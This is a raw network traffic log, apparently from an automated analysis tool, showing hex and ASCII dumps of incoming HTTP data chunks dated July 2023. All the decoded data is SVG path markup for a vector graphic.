30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                                    Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2505INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                                                                                                                    Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2521INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                                                                                                                    Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2537INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                                                                                                                    Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2553INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                    Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2569INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                                                                                                                    Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2585INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                    Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2601INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                    Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2617INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                                                                                                                    Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2633INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                                                                                                                    Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2649INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                                                                                                                    Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2665INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
                                                                                                                                                                                                                                                                    Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2681INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                                                                                                                    Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2697INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                    Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2713INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2729INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                    Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2745INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                    Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2761INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
